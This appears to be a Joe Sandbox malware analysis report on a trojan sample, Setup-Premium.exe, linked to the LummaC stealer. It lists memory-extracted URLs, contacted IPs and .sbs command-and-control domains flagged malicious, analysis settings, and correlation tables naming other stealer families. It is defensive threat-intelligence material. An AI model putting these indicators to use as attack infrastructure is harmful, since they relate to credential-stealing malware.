https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0 | BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a | BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://mathcucom.sbs/ | BitLockerToGo.exe, 00000002.00000003.2183297651.0000000002F3F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2193093217.0000000002F3F000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                                                                                                        https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amBitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=englishBitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englishBitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngBitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        https://avatars.akamai.steamstaticBitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          https://ehticsprocw.sbs/BitLockerToGo.exe, 00000002.00000003.2250209476.0000000002F2B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englisBitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCBitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            https://store.steampowered.com/about/BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            https://steamcommunity.com/my/wishlist/BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              http://html4/loose.dtdSetup-Premium.exefalse
                                                                                                                unknown
                                                                                                                https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=englishBitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                https://index.docker.io/v1/inputSetup-Premium.exefalse
                                                                                                                  unknown
                                                                                                                  https://help.steampowered.com/en/BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  https://steamcommunity.com/market/BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    https://store.steampowered.com/news/BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://json-schema.org/draft-04/schema#/properties/exclusiveMaximumSetup-Premium.exefalse
                                                                                                                      unknown
                                                                                                                      https://ehticsprocw.sbs/MBitLockerToGo.exe, 00000002.00000003.2250209476.0000000002F2B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        http://json-schema.org/draft-04/schema#/properties/descriptionSetup-Premium.exefalse
                                                                                                                          unknown
                                                                                                                          https://sergei-esenin.com/apiMBitLockerToGo.exe, 00000002.00000002.2300154573.0000000002F28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            http://store.steampowered.com/subscriber_agreement/BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgBitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              http://.cssSetup-Premium.exefalse
                                                                                                                                unknown
                                                                                                                                http://json-schema.org/draft-04/schema#/properties/enumSetup-Premium.exefalse
                                                                                                                                  unknown
                                                                                                                                  https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=enBitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://sergei-esenin.com/-BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    https://steamcommunity.com/discussions/BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      http://json-schema.org/draft-04/schema#/definitions/stringArraySetup-Premium.exefalse
                                                                                                                                        unknown
                                                                                                                                        https://sergei-esenin.com/%BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          https://store.steampowered.com/stats/BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://vennurviot.sbs/apiiBitLockerToGo.exe, 00000002.00000003.2250209476.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://store.steampowered.com/steam_refunds/BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://steamcommunity.com/EBitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                http://json-schema.org/draft-04/schema#/properties/minimumSetup-Premium.exefalse
                                                                                                                                                  unknown
                                                                                                                                                  https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&amp;l=eBitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    unknown
                                                                                                                                                    http://json-schema.org/draft-04/schema#/properties/exclusiveMinimumSetup-Premium.exefalse
                                                                                                                                                      unknown
                                                                                                                                                      http://json-schema.org/draft-04/schema#Setup-Premium.exefalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      unknown
                                                                                                                                                      https://steamcommunity.com/workshop/BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        unknown
                                                                                                                                                        https://store.steampowered.com/legal/BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        unknown
                                                                                                                                                        http://.jpgSetup-Premium.exefalse
                                                                                                                                                          unknown
                                                                                                                                                          https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=eBitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          unknown
                                                                                                                                                          http://json-schema.org/draft-04/schema#/definitions/positiveIntegerDefault0Setup-Premium.exefalse
                                                                                                                                                            unknown
                                                                                                                                                            https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvBitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=englBitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://www.cloudflare.com/learning/access-managyBitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F20000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2300154573.0000000002F28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              https://store.steampowered.com/BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvwBitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              unknown
IP               Domain               Country          ASN    ASN Name         Malicious
104.21.53.8      sergei-esenin.com    United States    13335  CLOUDFLARENETUS  true
172.67.173.224   ehticsprocw.sbs      United States    13335  CLOUDFLARENETUS  true
188.114.96.3     drawwyobstacw.sbs    European Union   13335  CLOUDFLARENETUS  true
172.67.152.13    enlargkiw.sbs        United States    13335  CLOUDFLARENETUS  true
104.102.49.254   steamcommunity.com   United States    16625  AKAMAI-ASUS      true
                                                                                                                                                              172.67.205.156
                                                                                                                                                              resinedyw.sbsUnited States
                                                                                                                                                              13335CLOUDFLARENETUStrue
                                                                                                                                                              172.67.140.193
                                                                                                                                                              vennurviot.sbsUnited States
                                                                                                                                                              13335CLOUDFLARENETUStrue
                                                                                                                                                              104.21.79.35
                                                                                                                                                              condifendteu.sbsUnited States
                                                                                                                                                              13335CLOUDFLARENETUStrue
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1532359
Start date and time: 2024-10-13 01:43:08 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 15s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Setup-Premium.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@3/0@11/8
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 15
• Number of non-executed functions: 95
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: Setup-Premium.exe
Time | Type | Description
19:44:12 | API Interceptor | 4x Sleep call for process: BitLockerToGo.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
104.21.53.8 | Solara.exe | Get hash | malicious | LummaC | Browse | -
104.21.53.8 | file.exe | Get hash | malicious | LummaC | Browse | -
104.21.53.8 | file.exe | Get hash | malicious | LummaC | Browse | -
104.21.53.8 | file.exe | Get hash | malicious | LummaC | Browse | -
104.21.53.8 | file.exe | Get hash | malicious | LummaC | Browse | -
104.21.53.8 | file.exe | Get hash | malicious | LummaC | Browse | -
104.21.53.8 | NDJBSLalTk.exe | Get hash | malicious | LummaC | Browse | -
104.21.53.8 | tlFLXwAslF.exe | Get hash | malicious | LummaC | Browse | -
104.21.53.8 | oOJUkmV24a.exe | Get hash | malicious | LummaC | Browse | -
104.21.53.8 | file.exe | Get hash | malicious | LummaC | Browse | -
172.67.173.224 | Loader.exe | Get hash | malicious | LummaC | Browse | -
172.67.173.224 | ASmartCore_[1MB]_[unsign].exe | Get hash | malicious | LummaC | Browse | -
188.114.96.3 | DRAFT DOC2406656.bat.exe | Get hash | malicious | Lokibot | Browse | touxzw.ir/sirr/five/fre.php
188.114.96.3 | lv961v43L3.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 863811cm.nyafka.top/video_RequestpacketUpdategeneratorPublic.php
188.114.96.3 | 10092024150836 09.10.2024.vbe | Get hash | malicious | FormBook | Browse | www.airgame.store/ojib/
188.114.96.3 | Hesap-hareketleriniz.exe | Get hash | malicious | FormBook | Browse | www.cc101.pro/59fb/
188.114.96.3 | octux.exe.exe | Get hash | malicious | Unknown | Browse | servicetelemetryserver.shop/api/index.php
188.114.96.3 | bX8NyyjOFz.exe | Get hash | malicious | FormBook | Browse | www.rtprajalojago.live/2uvi/
188.114.96.3 | lWfpGAu3ao.exe | Get hash | malicious | FormBook | Browse | www.serverplay.live/71nl/
188.114.96.3 | sa7Bw41TUq.exe | Get hash | malicious | FormBook | Browse | www.cc101.pro/0r21/
188.114.96.3 | E_receipt.vbs | Get hash | malicious | Unknown | Browse | paste.ee/d/VO2TX
188.114.96.3 | QUOTATION_OCTQTRA071244#U00faPDF.scr.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | filetransfer.io/data-package/fOmsJ2bL/download
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
drawwyobstacw.sbs | Solara.exe | Get hash | malicious | LummaC | Browse | 188.114.96.3
drawwyobstacw.sbs | Loader.exe | Get hash | malicious | LummaC | Browse | 188.114.96.3
drawwyobstacw.sbs | Wintohdd.exe | Get hash | malicious | LummaC | Browse | 188.114.96.3
drawwyobstacw.sbs | 670937a58778f_LisioFirendes.exe | Get hash | malicious | LummaC | Browse | 188.114.96.3
drawwyobstacw.sbs | ASmartCore_[1MB]_[unsign].exe | Get hash | malicious | LummaC | Browse | 188.114.96.3
drawwyobstacw.sbs | Solara.exe | Get hash | malicious | LummaC | Browse | 188.114.96.3
drawwyobstacw.sbs | Setup.exe | Get hash | malicious | LummaC | Browse | 188.114.96.3
drawwyobstacw.sbs | CachemanTray_[1MB]_[unsign].exe | Get hash | malicious | LummaC | Browse | 188.114.96.3
drawwyobstacw.sbs | vsYkceYJOX.exe | Get hash | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, RedLine, Stealc, Vidar | Browse | 188.114.97.3
drawwyobstacw.sbs | SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe | Get hash | malicious | LummaC, Vidar | Browse | 188.114.96.3
vennurviot.sbs | Solara.exe | Get hash | malicious | LummaC | Browse | 172.67.140.193
vennurviot.sbs | Loader.exe | Get hash | malicious | LummaC | Browse | 172.67.140.193
vennurviot.sbs | Wintohdd.exe | Get hash | malicious | LummaC | Browse | 172.67.140.193
vennurviot.sbs | 670937a58778f_LisioFirendes.exe | Get hash | malicious | LummaC | Browse | 172.67.140.193
vennurviot.sbs | ASmartCore_[1MB]_[unsign].exe | Get hash | malicious | LummaC | Browse | 104.21.46.170
vennurviot.sbs | Solara.exe | Get hash | malicious | LummaC | Browse | 172.67.140.193
vennurviot.sbs | Setup.exe | Get hash | malicious | LummaC | Browse | 104.21.46.170
vennurviot.sbs | CachemanTray_[1MB]_[unsign].exe | Get hash | malicious | LummaC | Browse | 172.67.140.193
vennurviot.sbs | vsYkceYJOX.exe | Get hash | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, RedLine, Stealc, Vidar | Browse | 104.21.46.170
vennurviot.sbs | SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe | Get hash | malicious | LummaC, Vidar | Browse | 172.67.140.193
steamcommunity.com | Solara.exe | Get hash | malicious | LummaC | Browse | 104.102.49.254
steamcommunity.com | file.exe | Get hash | malicious | LummaC | Browse | 104.102.49.254
steamcommunity.com | file.exe | Get hash | malicious | LummaC | Browse | 104.102.49.254
steamcommunity.com | file.exe | Get hash | malicious | LummaC | Browse | 104.102.49.254
steamcommunity.com | Loader.exe | Get hash | malicious | LummaC | Browse | 104.102.49.254
steamcommunity.com | file.exe | Get hash | malicious | LummaC | Browse | 104.102.49.254
steamcommunity.com | file.exe | Get hash | malicious | LummaC | Browse | 104.102.49.254
steamcommunity.com | file.exe | Get hash | malicious | LummaC | Browse | 104.102.49.254
steamcommunity.com | file.exe | Get hash | malicious | LummaC | Browse | 104.102.49.254
steamcommunity.com | file.exe | Get hash | malicious | LummaC | Browse | 104.102.49.254
condifendteu.sbs | Solara.exe | Get hash | malicious | LummaC | Browse | 172.67.141.136
condifendteu.sbs | Loader.exe | Get hash | malicious | LummaC | Browse | 104.21.79.35
condifendteu.sbs | Wintohdd.exe | Get hash | malicious | LummaC | Browse | 172.67.141.136
condifendteu.sbs | 670937a58778f_LisioFirendes.exe | Get hash | malicious | LummaC | Browse | 104.21.79.35
condifendteu.sbs | ASmartCore_[1MB]_[unsign].exe | Get hash | malicious | LummaC | Browse | 104.21.79.35
condifendteu.sbs | Solara.exe | Get hash | malicious | LummaC | Browse |
                                                                                                                                                                                      • 104.21.79.35
                                                                                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                      • 172.67.141.136
                                                                                                                                                                                      CachemanTray_[1MB]_[unsign].exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                      • 104.21.79.35
                                                                                                                                                                                      vsYkceYJOX.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                                                                                                                                                      • 172.67.141.136
                                                                                                                                                                                      SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                      • 104.21.79.35
Associated Sample Name / URL | Detection | Threat Name (Context IPs bulleted under each row; the Match value heads each group)
Match: CLOUDFLARENETUS (the report repeats this ten-row set four times; shown once)
v.1.6.3__x64__.msi | malicious | LegionLoader
• 172.67.221.87
phantomtoolsv2.exe | malicious | CredGrabber, Meduza Stealer
• 104.26.13.205
FluxusV2.exe | malicious | Python Stealer, CStealer
• 104.26.3.16
Solara.exe | malicious | LummaC
• 104.21.77.78
file.exe | malicious | LummaC
• 172.67.206.204
file.exe | malicious | LummaC
• 172.67.206.204
https://confortdelaine.net/_t/c/A1020005-17FCBF5826D778A0-C9FF7535?l=AAAjUdfNc16+VqCOWdjhu7TjhebDwXm6ITDaAzM2/RBqTCouOd4syZWt0oQeHch0J32d09qewtBep0xMzEqQw5uCDD5jzGMptv2Ml8tKG/C8CtlmUW+BwgihXDjkVb9+HrdQMTDnH/ltKCqbqkeSWCTVbTbsi7hQm50lkSO+uIKP+WaZVK5CwB+KNw5vz0h1+VWB9nXYS7r/65KwDXG1eoQ7LpgExf5uqFhJOeKU2lxyf8MZFWma+Jpcd8qAgpI5cl3w3zd+Vm0EYEfvHWX+4U6+p25bR3xOeQgBPB06jegeQ9cdnaCwg3Jra3NPSUfO/ZRQe9TJEW4VVwilXp7v0mwUyqJcK2y5kBNWNZEBnnQaAV+iawzJY19HetwEfzVabFBg3HhgYGx7XFWZYjHTHjwVWsbkjfgBb5461v0CHJjM9jrxfdj1kWIpcxid8O+dUSurKUOY4Hbb6SKXakBTmnkrYs0n3Xg5Ig==&c=AABu3sW2q3Ir8ifQJAijAhNJKq0uXwwF4aGWbgefQqJepVeNmQ2aDLrgth/4e3uZIWGGIQ8D3UPNbSnpgolkZPjCVjLlF8o96RZE6aKBP9hbbWDin7ntLRUM+OO5f3pIO2jZnmZof+ubVBUQEbWFAbo8xkwwPjD2yomWYO9BLauUbPdhe7sTeQubBshJfuD8IakpYR9mWvaRkj7jNE3uduhHnJqo59l67j+0INR7XdqioPPPYIlYt8Y2ErrD/Hm1x7Ub0JlpSy2dIylu82OHsbPe2IgE0AfUZGQlqmZjkJjdk/1R+5UTAbpM4Ru2nPA1W7k8m3b56CPQfp4Nfu7t5KTvxCSLpsyTXBp2H+CLMJgrqBWvScKuAGZzoBftoxN6AlJm7/tBk90HG/fSCigf6L5/vrhdqLwDnA3umOCSZNa6Rd/lq2DBocN9C5i+TM7dwQouAP+UKgVQf4ATMh19VLexy/mmb76HgGZt4HtVGufMb6cC2I7sVZK9dBduwlRzxT47SRfRKthnR5h3xirvQPbRJwRGy1YOGI3PBe6L8zkZnlHm4NWF1riKc7NfDV2jKR/ux1g+p2dIOZSC6QRSQfNi2L0zb9mMJvmZGJpdRbwk09T/RgLB6/6oigEcyMOmQDpPT8ma | malicious | Unknown
• 23.227.38.65
https://confortdelaine.net/_t/c/A1020005-17FCBF5826D778A0-C9FF7535?l=AACrcmbDni/ExL+6O84qnOq7s+7FEV7f2cEnFZCBGkVuVLwxJJ9kIF+/XsJvnT/ZZCSNu0ZPkHJMldgNU5hySzD4vbkLFmicZpeb27RRNiBBqzluO2njDgWrhNVOuuG5KecX01qr4Wu4+GPJbk1wcH4NmoDfnECMgEyVdYVJNd9SJ/Z6oeOmLYfmhHtJEcZB1zTo2XcCZUK4o1X55Z6mDqHfXia9/zchVngkbUJFubdOeeGrUXmliV4kA4X0r42Yjp3RKfpMvJU0dvSKL9oGxXQi9sD/MbbP4pxgNW6CajbdZVfsCIontUHWT1eFW4HrQm9NkGaKTegqBxEs/bh3fwfINtkSa08UEhuWP97GhgCO8AMh0qPvYF1Rp7eiHGFkb8QogMMfuDrW2QnTqHRWnTzitTqkjecFMC67nh1FVX/+SWo05+3MmWfzaTxkwp1iAJoDUcmTFcR0WSTfeepWakTIU1exnjYHjHsm9FYU&c=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 | malicious | Unknown
• 23.227.38.65
